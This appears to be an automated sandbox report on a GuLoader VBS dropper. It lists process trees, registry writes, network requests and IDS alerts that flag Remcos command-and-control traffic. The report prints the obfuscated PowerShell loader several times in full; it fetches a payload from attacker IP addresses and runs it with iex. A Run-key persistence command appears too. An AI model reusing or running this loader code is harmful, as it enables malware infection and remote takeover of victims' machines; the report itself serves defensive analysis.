| File name: | d2e251a9c99d6547f45cd5242a3df8800b09041ba5637cf2b79c87820f0b121f.vbs |
| Full analysis: | https://app.any.run/tasks/7e24083b-92ff-4ef5-a0d5-cec4873bf126 |
| Verdict: | Malicious activity |
| Threats: | GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. |
| Analysis date: | April 02, 2024, 13:36:37 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (1555), with CRLF line terminators |
| MD5: | A327225F272FD971B5F4F7AA315813B4 |
| SHA1: | 41038EC753BAC2FBBAEDA7C8D191E6B83E524559 |
| SHA256: | D2E251A9C99D6547F45CD5242A3DF8800B09041BA5637CF2B79C87820F0B121F |
| SSDEEP: | 384:XTNbD2JZcLchOhKMT+05RNcCQqG4ACXR4WuyTzLU8:jN+h1MT+ENcCW/CXftU8 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1408 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\d2e251a9c99d6547f45cd5242a3df8800b09041ba5637cf2b79c87820f0b121f.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 1644 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2876 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4232 | "C:\WINDOWS\system32\cmd.exe" /c "echo 1 && exit" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6400 | "C:\Program Files (x86)\windows mail\wab.exe" | C:\Program Files (x86)\Windows Mail\wab.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6420 | "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mesquits" /t REG_EXPAND_SZ /d "%Rumourers% -w 1 $Skaglen=(Get-ItemProperty -Path 'HKCU:\Convallamarin\').Jesuitess;%Rumourers% ($Skaglen)" | C:\Windows\SysWOW64\cmd.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.746 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6472 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6568 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Houve overlapningen Datalogidels Splining Torotoro Exoterics #>;<#Kaalhoved Complicitous Sdfyldte Boniterings Recessivt #>;New-Item -Path 'Cephalobranchiata:\Udnytters' -Name 'Rerecord114' -ItemType 'file';<#Tilsynskapitlers Emulgeringsmidler Kaminer Butts Anias #>;Function Untimeliest ([String]$Brnehaveklasser){$Tonalitetens = 2;For($Problemanalyse47=1; $Problemanalyse47 -lt $Brnehaveklasser.Length-1; $Problemanalyse47+=$Tonalitetens){ $ideopraxist = $Brnehaveklasser.Substring($Problemanalyse47, $Barrulee77); $Professionalist=$Professionalist+$ideopraxist; }$Professionalist;}$Barrulee77 = (cmd /c 'echo 1 && exit');if (Test-Path 'Cephalobranchiata:\Udnytters\Rerecord114') {$Barrulee77--};$Forlibe=Untimeliest '.i e x ';$Snatchingly=Untimeliest ',TSr a n sBf e rUr iRnRgD ';$Genmanipulationens = Untimeliest 'f\.sGy,sPwGoAwV6 4D\,W i.n.dAo wGsAPAoVw e.r SThOeLl lR\ v 1 .n0S\Lp o w e rOs h eRlUl,.Be,xKeQ ';function Bordendes ($Systemudviklingen){. ($Forlibe) ($Systemudviklingen);}$Raffinerende244=Untimeliest 'DhBt,t p :C/ / 1I4C7,.T7r8D.F1A0 3,.G2p5 0 / uhn i.v,eOrEsRaOl,s t,rOmKf oIrSs.yBnsiNn g eAr,. s,n pT>ChBtPt p.: / / 1S9 3H.t2 2 2P.G9A6 ..1S4I9./.uMn i vTeqrKsea l s tDrUm fMo.r s.yAn.i,nKgUe,rG.,s n pF ';$Esdragoneddikens=$Raffinerende244.split([char]62);$Raffinerende244=$Esdragoneddikens[0];Bordendes (Untimeliest ' $SgBlSoLbUaKl,:MNSoRn dNa nMgHe rsoBuCsPlUy = $BePnMv : wPiMn d iRrf ') ;Bordendes (Untimeliest 'N$Fg l,oIb a l : F.o rSeEsNtCaTvLe.s =O$SNDo.nsdPasnBgAe.rUoMu s l.y,+Y$ G.eMn m,aUn.iIpCuAlOa t idoSnse.nSsL ') ;Bordendes (Untimeliest '.$ g.lKoSbIaJl : T eftBr iBfRoSl 2 4F4 =R .(A(FgSwSm iR w i nI3B2 _Mp r oFcfeJsdsS -HFP P r o cTeFspsKI dU=D$ {OP,I D } ),.BC.o mUm aOnOd LEi.n e )P s- s p.lAi,t [ cVhDa,rl]C3I4, ');Bordendes (Untimeliest '.$Fg l oBbMaBl : M i s sSt eOm.n iFnFgUeOrH U=R $ATNe.terGiBfHo.l,2 4 4 [ $AT eStUr,i,f oLlP2 4,4 . cMosuvn,t.-B2C]A ');Bordendes (Untimeliest 'S$MgOlHo bDa l :FPPr oAbNlMesmNaBt i,sFeVr,iCn,g e n sP= ( TMe s.t -.PdaBtuh .$,FPo r eJs tIaPv e.s,)V - AAnFdD P( [,I nrt PFt rt] : :,sCiBzUe. .-IeLqV ,8,)D ') ;if ($Problematiseringens) {& $Forestaves $Misstemninger;} else {;$Flbedes198=Untimeliest 'M$GgSlBo bSa,lS:GK o m,mKuBnWe s kBoKlDeurHnUe.sH =U SGtTaKrSt - BEiRt s TNrGa n sVfAe rR A-.S,o.uIr cDe. C$ARKa fBf.i n ekrPe nTd.e 2U4B4G L-sDIe sTt itnSaSt.i o.nA $MN.oFn dJaCn.gUe r ouuRs lAyF ';Bordendes (Untimeliest 'T$FgAl o biaBl :fNUoPn.dPaRn gYeAr oSu.sSlSyS=H$ eLnFvH:.a.p.pTdSa.t,a ') ;Bordendes (Untimeliest ' IGm pToBrTt.- MGomdMu,l,eM BNiTt sPT r,a n.s,fRe rF ') ;$Nondangerously=$Nondangerously+'\Kalkulationskolonnernes.Pla' ;Bordendes (Untimeliest ' $ gOl oRbAaUl.:BLAa.ePr,lBi.n gSegf.oSrNhKoBl d = ( TFe s t -BP,aTtphL o$PN o n.d.a nJg.e,rCoAuJsKlCy ) ') ;while (-not $Laerlingeforhold) {Bordendes (Untimeliest 'MI fA N( $CKUoHmFm.uRnAeVs kNo l eSr nFe,s .cJ,o.bSSRtra tHep - ebq. H$TS.n aDt.cShBi n gSl yT) {OSEt a r,t -USFl,eTeTpd U1S}Te lRs e {TSat,aCr tG-BS l eSe,pT ,1A; B oPr,d eTnVd eUs O$ FslUbSepdFe.sR1T9A8,}O ');Bordendes (Untimeliest 'B$ g l,o bPa lC:.LMaJeSrLlTiFn,gLe f,o r h,o,l,dV=C(LT.e sVt -,P a tFh R$PN.o n,d.aNn gFeFrkoKu sMlSy ) ') ;$Raffinerende244=$Esdragoneddikens[$Untrusser++%$Esdragoneddikens.count];}Bordendes (Untimeliest '.$RgMl,o bMa lO:PS asc c,h,a.rFu l mAiIc S=. G e tU- C oAn.tHeEnDtT D$.NFoNn,dLaIn g eBr o u.sFlTy ');Bordendes (Untimeliest '.$SgFl oLb.aTl,: C iAvtiSl.h,o rEt o.n o mSe rDn.eKsA =, V[KSNyDsKtceSm .DCTo n vse,rCt ]M: :AFBr oRmPBSaPsFe 6U4.S.tPrMiYnHg (A$,S,a,c.cSh aRriuBl mFiIc )N ');Bordendes (Untimeliest ' $MgFl o b,a lH:,f,oSr,f.l gG L= T[PS yRs,t eEm.. T.e xStN..E nKc.oRd.iSn gF]D:,:rA S C.IOID. Gsent S,t.rSiAn g ( $ C i vui l hBo rLtBoSnOo mmeCrCnIeUsR) ');Bordendes (Untimeliest 'M$ gSlAo,b a,l,:.SGlGg,t s,n,a v n eTnIe sS=R$ fjoNr f l g..Ashu.bBs,tur.iAn gP( 3O4 0F6S6 9L, 2S1 8 8R0.). ');Bordendes $Slgtsnavnenes;};;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6732 | "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Houve overlapningen Datalogidels Splining Torotoro Exoterics #>;<#Kaalhoved Complicitous Sdfyldte Boniterings Recessivt #>;New-Item -Path 'Cephalobranchiata:\Udnytters' -Name 'Rerecord114' -ItemType 'file';<#Tilsynskapitlers Emulgeringsmidler Kaminer Butts Anias #>;Function Untimeliest ([String]$Brnehaveklasser){$Tonalitetens = 2;For($Problemanalyse47=1; $Problemanalyse47 -lt $Brnehaveklasser.Length-1; $Problemanalyse47+=$Tonalitetens){ $ideopraxist = $Brnehaveklasser.Substring($Problemanalyse47, $Barrulee77); $Professionalist=$Professionalist+$ideopraxist; }$Professionalist;}$Barrulee77 = (cmd /c 'echo 1 && exit');if (Test-Path 'Cephalobranchiata:\Udnytters\Rerecord114') {$Barrulee77--};$Forlibe=Untimeliest '.i e x ';$Snatchingly=Untimeliest ',TSr a n sBf e rUr iRnRgD ';$Genmanipulationens = Untimeliest 'f\.sGy,sPwGoAwV6 4D\,W i.n.dAo wGsAPAoVw e.r SThOeLl lR\ v 1 .n0S\Lp o w e rOs h eRlUl,.Be,xKeQ ';function Bordendes ($Systemudviklingen){. ($Forlibe) ($Systemudviklingen);}$Raffinerende244=Untimeliest 'DhBt,t p :C/ / 1I4C7,.T7r8D.F1A0 3,.G2p5 0 / uhn i.v,eOrEsRaOl,s t,rOmKf oIrSs.yBnsiNn g eAr,. s,n pT>ChBtPt p.: / / 1S9 3H.t2 2 2P.G9A6 ..1S4I9./.uMn i vTeqrKsea l s tDrUm fMo.r s.yAn.i,nKgUe,rG.,s n pF ';$Esdragoneddikens=$Raffinerende244.split([char]62);$Raffinerende244=$Esdragoneddikens[0];Bordendes (Untimeliest ' $SgBlSoLbUaKl,:MNSoRn dNa nMgHe rsoBuCsPlUy = $BePnMv : wPiMn d iRrf ') ;Bordendes (Untimeliest 'N$Fg l,oIb a l : F.o rSeEsNtCaTvLe.s =O$SNDo.nsdPasnBgAe.rUoMu s l.y,+Y$ G.eMn m,aUn.iIpCuAlOa t idoSnse.nSsL ') ;Bordendes (Untimeliest '.$ g.lKoSbIaJl : T eftBr iBfRoSl 2 4F4 =R .(A(FgSwSm iR w i nI3B2 _Mp r oFcfeJsdsS -HFP P r o cTeFspsKI dU=D$ {OP,I D } ),.BC.o mUm aOnOd LEi.n e )P s- s p.lAi,t [ cVhDa,rl]C3I4, ');Bordendes (Untimeliest '.$Fg l oBbMaBl : M i s sSt eOm.n iFnFgUeOrH U=R $ATNe.terGiBfHo.l,2 4 4 [ $AT eStUr,i,f oLlP2 4,4 . cMosuvn,t.-B2C]A ');Bordendes (Untimeliest 'S$MgOlHo bDa l :FPPr oAbNlMesmNaBt i,sFeVr,iCn,g e n sP= ( TMe s.t -.PdaBtuh .$,FPo r eJs tIaPv e.s,)V - AAnFdD P( [,I nrt PFt rt] : :,sCiBzUe. .-IeLqV ,8,)D ') ;if ($Problematiseringens) {& $Forestaves $Misstemninger;} else {;$Flbedes198=Untimeliest 'M$GgSlBo bSa,lS:GK o m,mKuBnWe s kBoKlDeurHnUe.sH =U SGtTaKrSt - BEiRt s TNrGa n sVfAe rR A-.S,o.uIr cDe. C$ARKa fBf.i n ekrPe nTd.e 2U4B4G L-sDIe sTt itnSaSt.i o.nA $MN.oFn dJaCn.gUe r ouuRs lAyF ';Bordendes (Untimeliest 'T$FgAl o biaBl :fNUoPn.dPaRn gYeAr oSu.sSlSyS=H$ eLnFvH:.a.p.pTdSa.t,a ') ;Bordendes (Untimeliest ' IGm pToBrTt.- MGomdMu,l,eM BNiTt sPT r,a n.s,fRe rF ') ;$Nondangerously=$Nondangerously+'\Kalkulationskolonnernes.Pla' ;Bordendes (Untimeliest ' $ gOl oRbAaUl.:BLAa.ePr,lBi.n gSegf.oSrNhKoBl d = ( TFe s t -BP,aTtphL o$PN o n.d.a nJg.e,rCoAuJsKlCy ) ') ;while (-not $Laerlingeforhold) {Bordendes (Untimeliest 'MI fA N( $CKUoHmFm.uRnAeVs kNo l eSr nFe,s .cJ,o.bSSRtra tHep - ebq. H$TS.n aDt.cShBi n gSl yT) {OSEt a r,t -USFl,eTeTpd U1S}Te lRs e {TSat,aCr tG-BS l eSe,pT ,1A; B oPr,d eTnVd eUs O$ FslUbSepdFe.sR1T9A8,}O ');Bordendes (Untimeliest 'B$ g l,o bPa lC:.LMaJeSrLlTiFn,gLe f,o r h,o,l,dV=C(LT.e sVt -,P a tFh R$PN.o n,d.aNn gFeFrkoKu sMlSy ) ') ;$Raffinerende244=$Esdragoneddikens[$Untrusser++%$Esdragoneddikens.count];}Bordendes (Untimeliest '.$RgMl,o bMa lO:PS asc c,h,a.rFu l mAiIc S=. G e tU- C oAn.tHeEnDtT D$.NFoNn,dLaIn g eBr o u.sFlTy ');Bordendes (Untimeliest '.$SgFl oLb.aTl,: C iAvtiSl.h,o rEt o.n o mSe rDn.eKsA =, V[KSNyDsKtceSm .DCTo n vse,rCt ]M: :AFBr oRmPBSaPsFe 6U4.S.tPrMiYnHg (A$,S,a,c.cSh aRriuBl mFiIc )N ');Bordendes (Untimeliest ' $MgFl o b,a lH:,f,oSr,f.l gG L= T[PS yRs,t eEm.. T.e xStN..E nKc.oRd.iSn gF]D:,:rA S C.IOID. Gsent S,t.rSiAn g ( $ C i vui l hBo rLtBoSnOo mmeCrCnIeUsR) ');Bordendes (Untimeliest 'M$ gSlAo,b a,l,:.SGlGg,t s,n,a v n eTnIe sS=R$ fjoNr f l g..Ashu.bBs,tur.iAn gP( 3O4 0F6S6 9L, 2S1 8 8R0.). ');Bordendes $Slgtsnavnenes;};;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6864 | REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mesquits" /t REG_EXPAND_SZ /d "%Rumourers% -w 1 $Skaglen=(Get-ItemProperty -Path 'HKCU:\Convallamarin\').Jesuitess;%Rumourers% ($Skaglen)" | C:\Windows\SysWOW64\reg.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (1408) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (1408) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (1408) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (1408) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6732) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (6732) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (6732) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (6732) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6400) wab.exe | Key: | HKEY_CURRENT_USER\Convallamarin |
| Operation: | write | Name: | Jesuitess |
Value: <#Houve overlapningen Datalogidels Splining Torotoro Exoterics #>;<#Kaalhoved Complicitous Sdfyldte Boniterings Recessivt #>;New-Item -Path 'Cephalobranchiata:\Udnytters' -Name 'Rerecord114' -ItemType 'file';<#Tilsynskapitlers Emulgeringsmidler Kaminer Butts Anias #>;Function Untimeliest ([String]$Brnehaveklasser){$Tonalitetens = 2;For($Problemanalyse47=1; $Problemanalyse47 -lt $Brnehaveklasser.Length-1; $Problemanalyse47+=$Tonalitetens){ $ideopraxist = $Brnehaveklasser.Substring($Problemanalyse47, $Barrulee77); $Professionalist=$Professionalist+$ideopraxist; }$Professionalist;}$Barrulee77 = (cmd /c 'echo 1 && exit');if (Test-Path 'Cephalobranchiata:\Udnytters\Rerecord114') {$Barrulee77--};$Forlibe=Untimeliest '.i e x ';$Snatchingly=Untimeliest ',TSr a n sBf e rUr iRnRgD ';$Genmanipulationens = Untimeliest 'f\.sGy,sPwGoAwV6 4D\,W i.n.dAo wGsAPAoVw e.r SThOeLl lR\ v 1 .n0S\Lp o w e rOs h eRlUl,.Be,xKeQ ';function Bordendes ($Systemudviklingen){. ($Forlibe) ($Systemudviklingen);}$Raffinerende244=Untimeliest 'DhBt,t p :C/ / 1I4C7,.T7r8D.F1A0 3,.G2p5 0 / uhn i.v,eOrEsRaOl,s t,rOmKf oIrSs.yBnsiNn g eAr,. s,n pT>ChBtPt p.: / / 1S9 3H.t2 2 2P.G9A6 ..1S4I9./.uMn i vTeqrKsea l s tDrUm fMo.r s.yAn.i,nKgUe,rG.,s n pF ';$Esdragoneddikens=$Raffinerende244.split([char]62);$Raffinerende244=$Esdragoneddikens[0];Bordendes (Untimeliest ' $SgBlSoLbUaKl,:MNSoRn dNa nMgHe rsoBuCsPlUy = $BePnMv : wPiMn d iRrf ') ;Bordendes (Untimeliest 'N$Fg l,oIb a l : F.o rSeEsNtCaTvLe.s =O$SNDo.nsdPasnBgAe.rUoMu s l.y,+Y$ G.eMn m,aUn.iIpCuAlOa t idoSnse.nSsL ') ;Bordendes (Untimeliest '.$ g.lKoSbIaJl : T eftBr iBfRoSl 2 4F4 =R .(A(FgSwSm iR w i nI3B2 _Mp r oFcfeJsdsS -HFP P r o cTeFspsKI dU=D$ {OP,I D } ),.BC.o mUm aOnOd LEi.n e )P s- s p.lAi,t [ cVhDa,rl]C3I4, ');Bordendes (Untimeliest '.$Fg l oBbMaBl : M i s sSt eOm.n iFnFgUeOrH U=R $ATNe.terGiBfHo.l,2 4 4 [ $AT eStUr,i,f oLlP2 4,4 . cMosuvn,t.-B2C]A ');Bordendes (Untimeliest 'S$MgOlHo bDa l :FPPr oAbNlMesmNaBt i,sFeVr,iCn,g e n sP= ( TMe s.t -.PdaBtuh .$,FPo r eJs tIaPv e.s,)V - AAnFdD P( [,I nrt PFt rt] : :,sCiBzUe. .-IeLqV ,8,)D ') ;if ($Problematiseringens) {& $Forestaves $Misstemninger;} else {;$Flbedes198=Untimeliest 'M$GgSlBo bSa,lS:GK o m,mKuBnWe s kBoKlDeurHnUe.sH =U SGtTaKrSt - BEiRt s TNrGa n sVfAe rR A-.S,o.uIr cDe. C$ARKa fBf.i n ekrPe nTd.e 2U4B4G L-sDIe sTt itnSaSt.i o.nA $MN.oFn dJaCn.gUe r ouuRs lAyF ';Bordendes (Untimeliest 'T$FgAl o biaBl :fNUoPn.dPaRn gYeAr oSu.sSlSyS=H$ eLnFvH:.a.p.pTdSa.t,a ') ;Bordendes (Untimeliest ' IGm pToBrTt.- MGomdMu,l,eM BNiTt sPT r,a n.s,fRe rF ') ;$Nondangerously=$Nondangerously+'\Kalkulationskolonnernes.Pla' ;Bordendes (Untimeliest ' $ gOl oRbAaUl.:BLAa.ePr,lBi.n gSegf.oSrNhKoBl d = ( TFe s t -BP,aTtphL o$PN o n.d.a nJg.e,rCoAuJsKlCy ) ') ;while (-not $Laerlingeforhold) {Bordendes (Untimeliest 'MI fA N( $CKUoHmFm.uRnAeVs kNo l eSr nFe,s .cJ,o.bSSRtra tHep - ebq. H$TS.n aDt.cShBi n gSl yT) {OSEt a r,t -USFl,eTeTpd U1S}Te lRs e {TSat,aCr tG-BS l eSe,pT ,1A; B oPr,d eTnVd eUs O$ FslUbSepdFe.sR1T9A8,}O ');Bordendes (Untimeliest 'B$ g l,o bPa lC:.LMaJeSrLlTiFn,gLe f,o r h,o,l,dV=C(LT.e sVt -,P a tFh R$PN.o n,d.aNn gFeFrkoKu sMlSy ) ') ;$Raffinerende244=$Esdragoneddikens[$Untrusser++%$Esdragoneddikens.count];}Bordendes (Untimeliest '.$RgMl,o bMa lO:PS asc c,h,a.rFu l mAiIc S=. G e tU- C oAn.tHeEnDtT D$.NFoNn,dLaIn g eBr o u.sFlTy ');Bordendes (Untimeliest '.$SgFl oLb.aTl,: C iAvtiSl.h,o rEt o.n o mSe rDn.eKsA =, V[KSNyDsKtceSm .DCTo n vse,rCt ]M: :AFBr oRmPBSaPsFe 6U4.S.tPrMiYnHg (A$,S,a,c.cSh aRriuBl mFiIc )N ');Bordendes (Untimeliest ' $MgFl o b,a lH:,f,oSr,f.l gG L= T[PS yRs,t eEm.. T.e xStN..E nKc.oRd.iSn gF]D:,:rA S C.IOID. Gsent S,t.rSiAn g ( $ C i vui l hBo rLtBoSnOo mmeCrCnIeUsR) ');Bordendes (Untimeliest 'M$ gSlAo,b a,l,:.SGlGg,t s,n,a v n eTnIe sS=R$ fjoNr f l g..Ashu.bBs,tur.iAn gP( 3O4 0F6S6 9L, 2S1 8 8R0.). ');Bordendes $Slgtsnavnenes;};; | |||
| (PID) Process: | (6400) wab.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6568 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sggzgq4n.rqg.ps1 | text | |
MD5:— | SHA256:— | |||
| 6568 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tvg3124g.oad.psm1 | text | |
MD5:— | SHA256:— | |||
| 6732 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1m1e04h4.w1u.ps1 | text | |
MD5:— | SHA256:— | |||
| 6732 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k0iwiuve.20o.psm1 | text | |
MD5:— | SHA256:— | |||
| 6732 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:— | SHA256:— | |||
| 6568 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:— | SHA256:— | |||
| 6568 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text | |
MD5:— | SHA256:— | |||
| 6400 | wab.exe | C:\Users\admin\AppData\Roaming\kajdnspt.dat | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1956 | svchost.exe | HEAD | 200 | 147.78.103.250:80 | http://147.78.103.250/universalstrmforsyninger.snp | unknown | — | — | unknown |
1956 | svchost.exe | GET | 200 | 147.78.103.250:80 | http://147.78.103.250/universalstrmforsyninger.snp | unknown | — | — | unknown |
6616 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | — | — | unknown |
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
4052 | SIHClient.exe | GET | 200 | 23.210.17.244:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | unknown |
4052 | SIHClient.exe | GET | 200 | 23.210.17.244:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
6400 | wab.exe | GET | 200 | 147.78.103.250:80 | http://147.78.103.250/CsYCpEo159.bin | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4828 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
5508 | svchost.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3996 | svchost.exe | 20.190.159.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1280 | MoUsoCoreWorker.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1956 | svchost.exe | 147.78.103.250:80 | — | OMER AY | US | unknown |
3996 | svchost.exe | 20.190.159.0:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
3996 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4052 | SIHClient.exe | 52.165.165.26:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
4052 | SIHClient.exe | 23.210.17.244:80 | www.microsoft.com | AKAMAI-AS | US | unknown |
4052 | SIHClient.exe | 20.242.39.171:443 | fe3cr.delivery.mp.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
Domain | IP | Reputation |
|---|---|---|
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
arc.msn.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
iwarsut775laudrye2.duckdns.org |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
6400 | wab.exe | Potentially Bad Traffic | ET HUNTING Generic .bin download from Dotted Quad |
2160 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain |
2160 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
6400 | wab.exe | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Checkin |
— | — | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Server Response |